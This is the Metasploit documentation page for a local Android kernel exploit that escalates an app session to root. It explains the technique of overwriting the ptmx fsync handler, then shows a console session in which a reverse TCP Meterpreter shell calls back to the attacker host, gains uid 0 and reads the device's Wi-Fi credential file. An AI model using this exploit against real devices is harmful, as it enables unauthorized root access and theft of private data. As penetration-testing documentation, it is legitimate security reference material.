infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/android/local/put_user_vroot.md

2.5 KiB
Raw Blame History

Intro

This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root priviledges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full priviledge on the device, and can access the entire filesystem and the private data files of every other app, including system apps.

The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit.

This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targetted.

Usage

You'll first need to obtain a session on the target device. Once the module is loaded, one simply needs to set the SESSION option and configure the handler. The exploit can take a while to run on the device so it is configured with WfsDelay option to wait 120 seconds for a session. If you have not had a session after this time you can assume the device is not vulnerable.

An example session follows:

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                        Information          Connection
  --  ----                        -----------          ----------
  1   meterpreter dalvik/android  u0_a132 @ localhost  192.168.1.52:4444 -> 192.168.1.54:33549 (192.168.1.54)


msf exploit(handler) > use exploit/android/local/put_user_vroot

msf exploit(put_user_vroot) > set LHOST 192.168.1.52
LHOST => 192.168.1.52

msf exploit(put_user_vroot) > set LPORT 5555
LPORT => 5555

msf exploit(put_user_vroot) > set SESSION 1
SESSION => 1

msf exploit(put_user_vroot) > run

[*] Started reverse TCP handler on 192.168.1.52:5555 
[*] Loading exploit library /data/data/com.metasploit.stage/files/bwycy
[*] Loaded library /data/data/com.metasploit.stage/files/bwycy, deleting
[*] Waiting 120 seconds for payload
[*] Sending stage (388156 bytes) to 192.168.1.54
[*] Meterpreter session 2 opened (192.168.1.52:5555 -> 192.168.1.54:59580) at 2016-12-24 00:19:12 +0800


meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0

meterpreter > cat /data/misc/wifi/wpa_supplicant.conf
ctrl_interface=wlan0
...